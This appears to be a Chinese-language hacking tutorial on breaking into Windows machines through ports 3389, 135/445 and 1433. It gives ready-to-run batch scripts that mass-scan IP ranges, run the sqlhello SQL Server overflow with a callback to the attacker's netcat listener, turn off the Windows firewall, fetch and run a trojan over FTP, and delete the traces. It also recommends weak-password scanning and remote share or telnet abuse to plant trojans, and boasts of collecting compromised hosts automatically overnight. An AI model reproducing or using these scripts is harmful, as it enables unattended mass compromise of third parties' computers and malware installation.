端口入侵方法

1，扫描端口
2，批量生成3389连接的工具
135、445
1，扫端口
2，用NTSCAN过滤有弱口令的机器
3，用recton 开telnet 传马或者用阿D工具包开共享传马
1433
方法1：
要用到的工具：S扫sqlhello.exe nc.exe 批处理文件
首先先写个批处理，打开记事本，把以下代码复制修改后，储存为扫描+溢出.bat文件
@echo off
for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
@echo off
for /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556
还要新建一个tt.txt，里面你要扫的IP段，格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格
1433是要扫描的端口，1000是扫描线程数，do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP，556是后面NC监听的端口
然后再写个批处理
@echo off
Nc -l -vv -p 556>daima.txt
echo username>>daima.txt
echo password>>daima.txt
echo bin>>daima.txt(以2进制传输数据)
echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt
echo bye>>daima.txt
net stop sharedaccess(关闭WINDOWS自带防火墙)
ftp -s:daima.txt
xxx.exe(也是填你木马的文件名)
del daima.txt
注意上面的代码回车符别删掉，要不然就没法下你的马了。

上面的步骤都搞好后，就可以开始扫肉鸡了。

先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。

自动扫描，扫描完后自动溢出，溢出后还自动下马执行，爽吧！所以这里讲详细点，呵呵。

还有42 21端口也可以这样溢出，只要用这些端口的溢出工具就好了。

忘了说，上面的工具和批处理什么的都要放在同一个文件夹下。

要用到的工具：端口扫描器 X-scan SQL综合利用工具。